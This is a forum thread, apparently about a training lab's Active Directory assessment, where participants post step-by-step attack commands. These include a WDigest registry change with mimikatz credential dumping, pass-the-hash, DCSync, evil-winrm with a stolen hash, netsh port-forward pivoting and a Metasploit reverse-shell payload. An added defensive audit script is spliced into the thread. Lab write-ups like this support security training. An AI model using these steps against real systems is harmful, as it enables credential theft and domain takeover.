Active Directory - Skills Assessment I

Sorry about the stupid question but: I can’t get a better shell. All my tries give me shells that don’t allow me to run mimikatz or Enter-PSSession. Which one did you use?

1 Like

Hi, I am stuck on Skills Assessment Part I trying to find tpetty’s password. The question is: Submit this user’s cleartext password.
I have tried mimikatz, crackmapexec, Rubeus, dumping LSA, connecting with SMB, but nothing works. I tried from Kali and Windows. I have uploaded tools to Windows to try from there. With this command C:\Rubeus.exe kerberoast /outfiles:hashes.txt [/user:tpetty] [/domain:INLANEFREIGHT.LOCAL] [/dc:DC01.INLANEFREIGHT.LOCAL] I saw 7 hashes, but tpetty’s name isn’t there. Mimikatz found only the admin account. Can someone write the steps to find the cleartext password?

Edit: I have found the NTLM hash of tpetty, but hashcat was unable to crack it. Does anyone know how to crack it?

1 Like

I know researching is the best practice to be a good hacker, but here is my grain of sand.
For those who are stuck on the cleartext password and are not able to dump lsass with mimikatz:
Since (relatively) new versions, Microsoft added a secure configuration to the WDigest registry key to prevent dumping it with mimikatz.
Just go to cmd and change the value of the REG_DWORD to 1:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
and after that, force the update:
gpupdate /force

Now dump it again and there it is…

This doesn’t show the clear-text password for me; after changing the registry and dumping with mimikatz it shows (null) under wdigest.

Dump the lsass with mimi.

Couldn’t succeed with your suggestion, it doesn’t work with Mimikatz, but I succeeded by dumping the SAM files; with secretsdump I found the cleartext password…

I did it that way.

To anyone having issues with pivoting to the DC: you would get a hint from BloodHound to escalate the privs from t*****. Do the attack mentioned in BloodHound correctly, with impersonation. Read the Mimikatz docs in detail.

This one was difficult due to some items not really covered in the modules.

If you’re stuck on the DCSync follow this link and review the part that goes over a registry change. You’ll have to reboot the MS01 server for that change to apply. You should then be able to perform the DCSync attack.

For the final challenge (Domain Takeover) I suggest Googling PTH.

Hello guys!! I am really stuck with an error when I try to use xfreerdp with proxychains. I used meterpreter tunnelling and pivoted through the WEB01 machine to make xfreerdp reach MS01. Although the proxychains nmap command works, xfreerdp gives an error. It says “Please check that the $DISPLAY environment variable is properly set”. Actually it was working before, but I took a break for a few weeks. And now I can’t make it work. Do you guys have any idea what I am missing? Thanks.

Is anyone else having problems with the webshell? I can log into it just fine but cannot execute any commands nor upload anything. It just loads and after some time the connection is reset. Am I missing something here?

Try doing /timeout:<time in ms> for xfreerdp and setting the resolution with /size:

To ellerion: I created a metasploit reverse shell to the jumphost, then set up proxychains so you can nmap scan it. You can scan port 3389 specifically.

This box is so cooked.

First try I did, on my web shell no matter what I did with nc.exe it would crash the whole thing and I wouldn’t get a stable shell. I used meterpreter instead and chisel, which worked. However I couldn’t RDP into MS01 no matter how hard I tried.

Second try, I used the same chisel.exe and transferred it; with the same commands it didn’t work. It says “Class not registered” or something. Ended up using local port forwarding on meterpreter, and tried proxychains with autoroute; both didn’t work.

Third try, the same chisel didn’t work, even after I downloaded a new one. Local port forwarding with the same commands finally worked. I RDP-ed successfully, but no matter what, wdigest couldn’t work, even with the suggestions here. Secretsdump.py wouldn’t work as well.

Fourth try, I tried to get a shell with meterpreter instead. Set up reverse port forwarding so that the remote host could download from my attack host through the jumphost. The Invoke-WebRequest to get the revshell actually worked, but only once. Afterwards I tried downloading other files over, or the same file again, and it couldn’t make a connection to my attacker http.server. The revshell couldn’t make a connection either.

These boxes are literally so buggy I don’t even know how you guys are doing this.

1 Like

For those still struggling with tpetty’s clear password. 10.129.230.129 is the box address generated by the section, port 1515 is just a number that does not get blocked, lu**** is the svc_sql cleartext password.

  1. netsh interface portproxy add v4tov4 listenport=1515 listenaddress= connectport=3389 connectaddress=172.16.6.50
  2. xfreerdp /v:10.129.230.129:1515 /u:svc_sql /p:lu**** +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
  3. Copy mimikatz to the local system from the shared location folder
  4. Run PowerShell with admin rights
  5. reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
  6. gpupdate /force
  7. REBOOT the Windows machine, YES I mean it, click the reboot button of the machine you just RDP’d into through netsh
  8. mimikatz
  9. privilege::debug
  10. sekurlsa::logonPasswords

For the last question,

  • Use mimikatz to DC-Sync
  • sekurlsa::pth /user:tpetty /ntlm: /domain:dc01.inlanefreight.local /impersonate
  • lsadump::dcsync /domain:INLANEFREIGHT.LOCAL
  • Got the Administrator Hash
  • Create port forwarding (mine used netsh.exe with port 5985 for evil-winrm)
  • netsh.exe interface portproxy add v4tov4 listenport=2515 listenaddress=10.129.94.122 connectport=5985 connectaddress=172.16.6.3
  • evil-winrm -i 10.129.94.122 -u “Administrator” -H
  • Go get the flag

Finally finished the first part, moving to the second part.
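The two walkthroughs above (the WDigest registry change earlier in the thread, and the netsh portproxy steps in the list just above) both leave durable, host-visible artefacts on MS01. The following read-only audit script is an added example, not something posted in this thread or part of the HTB lab material: it checks the WDigest UseLogonCredential value named in the posts and enumerates netsh portproxy rules, which netsh stores under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp (value name = listenaddress/listenport, data = connectaddress/connectport). The registry locations are the standard Windows ones; the output layout is this example’s own choice.

```powershell
# Added example: audit a Windows host for the two changes discussed in this thread.
# Run from an elevated PowerShell prompt. Read-only: nothing is modified.

$findings = @()

# 1. WDigest: UseLogonCredential=1 makes LSASS keep cleartext credentials in memory,
#    which is exactly what the mimikatz sekurlsa::logonpasswords step relies on.
$wdPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$wd = Get-ItemProperty -Path $wdPath -Name UseLogonCredential -ErrorAction SilentlyContinue
if ($null -ne $wd -and $wd.UseLogonCredential -eq 1) {
    $findings += [pscustomobject]@{
        Check  = 'WDigest'
        Detail = "UseLogonCredential=1 at $wdPath (cleartext credential caching enabled)"
    }
}

# 2. netsh portproxy rules persist in the registry and survive reboots.
#    Each value: name 'listenaddress/listenport' -> data 'connectaddress/connectport'.
$ppPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
if (Test-Path -Path $ppPath) {
    $rules = Get-ItemProperty -Path $ppPath
    foreach ($prop in $rules.PSObject.Properties) {
        # Get-ItemProperty adds PSPath, PSParentPath, PSChildName, PSDrive, PSProvider; skip them.
        if ($prop.Name -like 'PS*') { continue }
        $findings += [pscustomobject]@{
            Check  = 'PortProxy'
            Detail = "listen $($prop.Name) -> connect $($prop.Value)"
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No WDigest cleartext caching and no portproxy rules found.'
} else {
    $findings | Format-Table -AutoSize
}
```

On a clean host both checks come back empty. If the script reports UseLogonCredential=1, setting it back to 0 (and rebooting, as the thread notes the setting is only picked up after a restart) removes the cleartext material from future logons; a reported portproxy entry can be removed with netsh interface portproxy delete v4tov4 using the same listenport and listenaddress it shows.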

Hey, were you able to move forward? I’m struggling to proxy my tools through the web server (the machine hosting the webshell). I tried Chisel; it connected, but I could not interact with the internal network. I also tried to get a reverse shell with both Meterpreter and ConPtyShell, but no luck, lol. I’m so frustrated; I don’t even know what to do now. Could you at least help me get a shell on the web server, if possible? Thanks in advance! :pensive: :angry:

Also, here is my Discord; I will notice it quicker if you contact me on Discord:
magdy3660

mag0x00

I definitely used meterpreter.
msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run

If you can’t get a reverse shell on the web server then I’m not sure either, sorry :frowning:
If metasploit works, just set up autoroute and port forwarding, and add the correct subnet. From there I pretty much just use proxychains.